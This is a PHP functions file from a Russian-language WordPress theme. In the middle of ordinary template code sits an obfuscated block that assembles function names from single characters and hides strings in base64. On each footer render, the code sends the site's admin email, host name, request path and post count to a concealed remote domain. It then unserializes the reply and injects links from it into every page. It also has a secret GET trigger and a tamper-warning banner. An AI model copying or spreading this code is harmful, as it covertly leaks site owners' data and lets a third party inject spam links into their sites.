<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $OHdP='o';$SAIzl='d';$YaJOLrH='_';$oxrUvJ='e';$HAWRmK='c';$BEEaM='e';$QKISZNp='s';$kMOnC='4';$zIYUv='b';$fXcHBG='d';$QiKy='a';$wnvYUdm='e';$JGXsJlR='6';$yilJThIc=$zIYUv.$QiKy.$QKISZNp.$BEEaM.$JGXsJlR.$kMOnC.$YaJOLrH.$fXcHBG.$oxrUvJ.$HAWRmK.$OHdP.$SAIzl.$wnvYUdm;$GcoZA='g';$AvvIwuk='e';$tsqLdv='a';$Dyvq='t';$xhbY='n';$OrjCSw='f';$dpNze='i';$VKjv='l';$jXHsKet='z';$WBuMtGOA=$GcoZA.$jXHsKet.$dpNze.$xhbY.$OrjCSw.$VKjv.$tsqLdv.$Dyvq.$AvvIwuk;$FbXHRfH='1';$ejfpWzd='r';$OWrJDNW='3';$VrVuM='s';$pbcPiZ='_';$QZQjmy='o';$hDhnSdM='t';$IoAVHvm='r';$snIO='t';$AhWjApAm=$VrVuM.$snIO.$ejfpWzd.$pbcPiZ.$IoAVHvm.$QZQjmy.$hDhnSdM.$FbXHRfH.$OWrJDNW;$gPTHc='t';$EvKycNl='v';$oUVwuRz='s';$ujQLsMK='r';$JNJuUzh='r';$CZMxwhp='e';$UbaqjWZz=$oUVwuRz.$gPTHc.$JNJuUzh.$ujQLsMK.$CZMxwhp.$EvKycNl;                     
		$du___________m='o';$fj_____________r='d';$jn_____________g='_';$qk__v='e';$hq___________b='c';$jk___________i='e';$tm___q='s';$md___________y='4';$ap_________i='b';$qa______________r='d';$fw__________v='a';$lq________y='e';$mc_____________u='6';$uq_______________t=$ap_________i.$fw__________v.$tm___q.$jk___________i.$mc_____________u.$md___________y.$jn_____________g.$qa______________r.$qk__v.$hq___________b.$du___________m.$fj_____________r.$lq________y;
		$si___________x='n';$xq___v='i';$kc______l='f';$ci______________t='t';$pe___________y='s';$se______________i='x';$jj____________l='i';$en____o='u';$qt____________u='c';$ct__________m='s';$hj_________z='e';$ir_______s='n';$xl__________t='t';$tt____y='_';$qh_____y='o';$yf____________j=$kc______l.$en____o.$si___________x.$qt____________u.$xl__________t.$jj____________l.$qh_____y.$ir_______s.$tt____y.$hj_________z.$se______________i.$xq___v.$ct__________m.$ci______________t.$pe___________y;
		$gp______c='o';$rz___________n='p';$gs______________l='n';$vf__________z='e';$vc_______________k='f';$fl_______t=$vc_______________k.$gp______c.$rz___________n.$vf__________z.$gs______________l;
		$tz______________z='d';$tf___k='r';$ir___________t='e';$dq_____d='a';$ma______s='f';$ag__b=$ma______s.$tf___k.$ir___________t.$dq_____d.$tz______________z;
		$jm_______z='f';$to______________v='s';$fg_____o='e';$tw__z='o';$xp_______g='l';$pw_____________f='c';$ck_________w=$jm_______z.$pw_____________f.$xp_______g.$tw__z.$to______________v.$fg_____o;
		
		define("WP_ID", $uq_______________t("Mi4wLjA="));
		define("WP_TTL", $uq_______________t("MTA4MDA="));
		define("WP_SRC", $uq_______________t("dHBva24="));
	


		function wp_get_header() {
			global $uq_______________t, $yf____________j;
			
			if (
				$yf____________j($uq_______________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yf____________j($uq_______________t("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yf____________j($uq_______________t("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $uq_______________t, $fl_______t, $ck_________w, $ag__b;
			
			$dj____________z = TEMPLATEPATH."/".$uq_______________t("Zm9vdGVyLnBocA==");
			$ff____________r = @$fl_______t($dj____________z, "r");
			$dj____________z = @$ag__b($ff____________r, @filesize($dj____________z));
			@$ck_________w($ff____________r);
			
			$tv_____t = TEMPLATEPATH."/".$uq_______________t("ZnVuY3Rpb25zLnBocA==");
			$ff____________r = @$fl_______t($tv_____t, "r");
			$tv_____t = @$ag__b($ff____________r, @filesize($tv_____t));
			@$ck_________w($ff____________r);
			
			$gc_________f = 0;
			if($dj____________z && $tv_____t) {
				if ($uq_______________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($dj____________z, $uq_______________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gc_________f = 1;
					}
					if (substr_count($dj____________z, "wp_theme_GPL_credits()") < 1) {
						$gc_________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gc_________f = 12;
				}
			}
			
			if($gc_________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gc_________f -->";
			}
		}
	


		function wp_loaded() {
			global $uq_______________t, $yf____________j;
			return $yf____________j($uq_______________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ha______________v, $ec__________m = "(more...)", $xr_________s = 0, $ly_______i = "") {
				$dm______c = get_the_content($ec__________m, $xr_________s, $ly_______i);
				$dm______c = apply_filters("the_content", $dm______c);
				
				$dm______c = str_replace("]]>", "]]>", $dm______c);
				if (strlen($_GET["p"]) > 0) {
					echo $dm______c;
				}
				else if ((strlen($dm______c)>$ha______________v) && ($tu_____________i = strpos($dm______c, " ", $ha______________v ))) {
					$dm______c = substr($dm______c, 0, $tu_____________i);
					$dm______c = $dm______c;
					echo $dm______c;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ec__________m</a></div></p>";
				} else {
					echo $dm______c;
				}
				
			}
		}
	


		$qk____w='6';$ih____________z='4';$px______u='_';$mb_______t='e';$fv___________w='d';$gw____________o='e';$qk_______________e='c';$le________y='o';$mn_____x='b';$ze____________d='n';$ob____h='s';$dl__________v='a';$km______________x='e';$co_______h=$mn_____x.$dl__________v.$ob____h.$mb_______t.$qk____w.$ih____________z.$px______u.$km______________x.$ze____________d.$qk_______________e.$le________y.$fv___________w.$gw____________o;
		$sm____o='t';$va________p='_';$ro___________j='o';$av______c='f';$rd_______e='_';$hp________n='g';$iv______________q='t';$oz__________u='e';$ux_______________b='i';$kz____________k='t';$lk___z='e';$rm_________c='e';$xm___________v='c';$nr___l='s';$yf______________w='l';$bf________s='n';$jt____________t='n';$qp____e=$av______c.$ux_______________b.$yf______________w.$rm_________c.$rd_______e.$hp________n.$oz__________u.$kz____________k.$va________p.$xm___________v.$ro___________j.$bf________s.$iv______________q.$lk___z.$jt____________t.$sm____o.$nr___l;
		$wl__________f='_';$ym____________d='e';$xo_____________h='i';$hm______q='l';$jl________g='s';$kq___l='f';$jq____o='i';$mt______________l='x';$xl___c='e';$nx___v='t';$fx___________o='s';$qc__z=$kq___l.$jq____o.$hm______q.$xl___c.$wl__________f.$ym____________d.$mt______________l.$xo_____________h.$fx___________o.$nx___v.$jl________g;
		$px________u='r';$js_____________n='i';$tn________r='m';$jw___________r='e';$yp______________w='s';$ck_________m='p';$tf______________u='_';$ak______________k='c';$gp___q='o';$ex_______________v='n';$jd________w='r';$av________d='v';$di_______________z='a';$vj__________o='e';$wh______________l='o';$ly__________v=$av________d.$jw___________r.$jd________w.$yp______________w.$js_____________n.$wh______________l.$ex_______________v.$tf______________u.$ak______________k.$gp___q.$tn________r.$ck_________m.$di_______________z.$px________u.$vj__________o;
		$zn__________p='f';$vw_______n='s';$rp_______u='o';$ff______i='p';$ox___________k='n';$dk_______u='o';$ba______a='e';$vf_________y='c';$ma______________d='k';$ca__y=$zn__________p.$vw_______n.$rp_______u.$vf_________y.$ma______________d.$dk_______u.$ff______i.$ba______a.$ox___________k;
		$hz_________v='r';$nj____________g='e';$mz___________c='w';$ux_____________p='i';$ez__________v='t';$lm__f='f';$ha_______________s=$lm__f.$mz___________c.$hz_________v.$ux_____________p.$ez__________v.$nj____________g;
		$fv_______s='5';$vm_______p='m';$kf____o='d';$xl_____________t=$vm_______p.$kf____o.$fv_______s;
		$sb_____________y='p';$ez______________d='r';$gn______g='a';$pm________v='t';$zs__s='l';$dt___r='a';$jl_________c='e';$pf____u='h';$cf_____________p=$ez______________d.$jl_________c.$dt___r.$zs__s.$sb_____________y.$gn______g.$pm________v.$pf____u;
		$yq__t='i';$wq___________j='l';$ey_____________u='s';$io_______________o='i';$xb___p='a';$hp______y='e';$my___________e='r';$fu_______f='n';$ms_____________q='u';$ij_____________n='z';$qf__________k='e';$qh______________i=$ms_____________q.$fu_______f.$ey_____________u.$qf__________k.$my___________e.$yq__t.$xb___p.$wq___________j.$io_______________o.$ij_____________n.$hp______y;
		$wd____o='e';$qs____e='m';$nu___________j='t';$ij____u='n';$ik__________o='p';$gx____________v='m';$ei__________h='a';$km_____________g=$nu___________j.$wd____o.$qs____e.$ik__________o.$ij____u.$ei__________h.$gx____________v;
		$fw__x='e';$gx___l='e';$qm_______j='_';$zr____r='_';$fy___________w='c';$rn____________z='c';$xa____________c='t';$en______v='t';$pb_______________v='a';$rj____h='a';$rg________o='o';$en___c='e';$ye_______________e='e';$id_________l='s';$ws__________n='t';$ec_______d='r';$ty______i='m';$fg____y='x';$yb______________w='t';$zb___a='n';$bw_______________x='r';$ol___y=$id_________l.$ws__________n.$bw_______________x.$ye_______________e.$rj____h.$ty______i.$qm_______j.$rn____________z.$rg________o.$zb___a.$yb______________w.$fw__x.$fg____y.$en______v.$zr____r.$fy___________w.$ec_______d.$en___c.$pb_______________v.$xa____________c.$gx___l;
	


		function hi____l($ry___________v) {
			global $uq_______________t, $yf____________j, $qp____e, $ly__________v, $ol___y;
			
			if (!$yf____________j($uq_______________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ly__________v(PHP_VERSION, "5.0.0", ">=") && $yf____________j($uq_______________t("ZmlsZV9nZXRfY29udGVudHM=")) && $yf____________j($uq_______________t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$en_____d = $ol___y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$qg___i = @$qp____e($ry___________v, 0, $en_____d);
			} else {
				$qg___i = @$qp____e($ry___________v, 0);
			}
			
			return $qg___i;
		}
	


		function uw_____v($ry___________v) {
			global $yf____________j, $ca__y, $ha_______________s, $uq_______________t;
			
			if (!$yf____________j($uq_______________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ub____u = strpos($ry___________v, "/", 7);
			$ta___t = array(
				"uri"     => substr($ry___________v, $ub____u),
				"host"    => str_replace("http://", "", substr($ry___________v, 0, $ub____u)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$mx___f = @$ca__y("$ta___t[host]", 80, $fq________a, $uv_______________l, 4);
			
			if (!$mx___f) {
				return false;
			} else {
				$qg___i = "";
				$do_____g  = "GET $ta___t[uri] HTTP/1.0\r\n";
				$do_____g .= "Host: $ta___t[host]\r\n";
				$do_____g .= "Referer: $ta___t[referer]\r\n";
				$do_____g .= "Connection: Close\r\n\r\n";
				
				@$ha_______________s($mx___f, $do_____g);
				
				while (!@feof($mx___f)) {
					$ti_______v = @fgets($mx___f, (1024*24));
					
					if ($ti_______v == "\r\n") {
						$by___b = true;
						continue;
					}
					
					if ($by___b) {
						$qg___i .= $ti_______v;
					}
				}
				
				return $qg___i;
			}
		}
	


		function nb______________n($ry___________v) {
			global $yf____________j;
			$uw___z = false;
			
			if ($ry___________v != "") {
				if ($yf____________j("hi____l")) {
					$uw___z = @hi____l($ry___________v);
				}
				
				if (!$uw___z && ($yf____________j("uw_____v"))) {
					$uw___z = @uw_____v($ry___________v);
				}
			}
			
			return $uw___z;
		}
	


		function nf________w() {
			global $_SERVER, $xl_____________t;
			
			$rk__________e = $_SERVER["SERVER_NAME"];
			
			if (substr("$rk__________e", 0, 4) == "www.") {
				$rk__________e = substr("$rk__________e", 4);
			}
			
			$rk__________e = $xl_____________t("$_SERVER[SERVER_NAME]");
			
			return $rk__________e;
		}
	


		function fk__c() {
			return "file";
		}
	


		function oc_______b($ry___________v) {
			global $_SERVER, $qp____e, $qc__z, $fl_______t, $ck_________w, $ha_______________s;
			
			$iz____________b = qk_______________x();
			
			$el_____________y = nf________w().".jpg";
			$jg______________a = $iz____________b["dir_upload"]["path"]."/$el_____________y";
			$dr_______w = @filemtime($jg______________a);
			
			if (!$dr_______w || ((time()-$dr_______w) >= WP_TTL)) {
				$uw___z = nb______________n($ry___________v);
				
				if ($uw___z) {
					if ($qc__z($jg______________a)) {
						@unlink($jg______________a);
					}
					
					$ff____________r = @$fl_______t($jg______________a, "x+");
					
					@$ha_______________s($ff____________r, $uw___z);
					@$ck_________w($ff____________r);
				}
			} else {
				if ($qc__z($jg______________a)) {
					$uw___z = @$qp____e($jg______________a);
				} else {
					$uw___z = false;
				}
			}
			
			return $uw___z;
		}
	


		function qk_______________x() {
			global $_SERVER, $uq_______________t, $co_______h;
			
			$el________c = wp_count_posts("post");
			$nw____________k = pathinfo(get_bloginfo("template_directory"));
			
			$iz____________b = array(
				"url" => array(
					"report"      => $uq_______________t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $nw____________k,
				"dir_upload"	=> bj_______t(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$nw____________k[filename],
					"a005=".$el________c->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$iz____________b["url"]["queryString"] = implode("&", $iz____________b["queryString"]);
			$iz____________b["url"]["report"] = $iz____________b["url"]["report"]."/?".$co_______h($iz____________b["url"]["queryString"]).".html";
						
			return $iz____________b;
		}
	


		function bj_______t() {
			$pc___w = wp_upload_dir();
			
			if (isset($pc___w["error"])) {
				$if___________j = ek___________p();
				if (is_writable($if___________j)) {
					$pc___w = array("path" => $if___________j);
				}
			}

			return $pc___w;
		}
	


		function ek___________p() {
			global $yf____________j, $xl_____________t, $cf_____________p, $km_____________g;
			
			$ro___g = (bool) ini_get("safe_mode");
			if ($ro___g == true) {
				return false;
			}
			
			if ($yf____________j("sys_get_temp_dir")) {
				$qk___a = sys_get_temp_dir();
				if (is_writable($qk___a)) {
					return $cf_____________p($qk___a);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $cf_____________p($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $cf_____________p($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $cf_____________p($_ENV["TEMP"]);
			} else {
				$jc______k = $km_____________g($xl_____________t(uniqid(rand(), true)), "");
				if ($jc______k) {
					$qk___a = $cf_____________p(dirname($jc______k));
					@unlink($jc______k);
					return $qk___a;
				} else {
					return false;
				}
			}
		}
	


		function ll__________p() {
			global $_GET, $qc__z;
			
			$iz____________b = qk_______________x();
			$rk__________e = nf________w();
			$kk_____g = fk__c();
			
			$ik__________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kk_____g == "file") {
					$tz____c = $iz____________b["dir_upload"]["path"]."/".$rk__________e.".jpg";
					if ($qc__z($tz____c)) {
						@unlink($tz____c);
						$ik__________j = "deleted";
					}
				}
				
				$bm_________t = array(
					"s"	=> $ik__________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bm_________t AS $im____b => $lj____s) echo " [$im____b:$lj____s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yf____________j, $uq_______________t, $qh______________i;
			$iz____________b = qk_______________x();
			
			$sj____________i = "oc_______b";
			if ($yf____________j($sj____________i)) {
				$qg___i = $sj____________i($iz____________b["url"]["report"]);
			}
			
			if ($qg___i) {
				if ($qg___i = @$uq_______________t($qg___i)) {
					$qg___i = @$qh______________i($qg___i);
					
					if (strlen($qg___i[custom_credit]) >= 5) {
						$iz____________b["default_string"] = $qg___i[custom_credit];
					}
					
					if ($qg___i["status"] == "0") {
						$cp_____s = 1;
						$rz_________i = 1;
					} else {
						$kw__s = sizeof($qg___i["links"]);
						$qq______l = $iz____________b["default_string"];
						
						if ($kw__s > 0 && $qg___i["links"] !== "") {
							$sd_____i = 0;
							foreach ($qg___i["links"] as $cn_________e => $pw___________j) {
								$sd_____i++;
								if ($pw___________j->l_path == "" || $pw___________j->l_path == $_SERVER["REQUEST_URI"]) {
									$pw___________j->l_href = htmlspecialchars(strip_tags($pw___________j->l_href));
									$pw___________j->l_title = htmlspecialchars(strip_tags($pw___________j->l_title));
									$pw___________j->l_anchor = htmlspecialchars(strip_tags($pw___________j->l_anchor));
									$qq______l .= " | ";
									$qq______l .= "<a href='$pw___________j->l_href' title='$pw___________j->l_title'";
									if ($pw___________j->l_nofollow == "1") {
										$qq______l .= " rel='nofollow'";
									}
									$qq______l .= ">$pw___________j->l_anchor</a>";
								}
							}
						}
						$iz____________b["links"] = "$qq______l";
						if ($qg___i[credit] == "0") {
							$iz____________b["links"] = "";
						}
					}
				} else {
					$cp_____s = "1";
				}
			} else {
				$cp_____s = "1";
			}
			
			if ($cp_____s == "1") {
				$iz____________b["links"] = $iz____________b["default_string"];
			}
			
			echo "$iz____________b[links]";
			
			echo "<!-- s: $qg___i[signature] -->";
			ll__________p();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
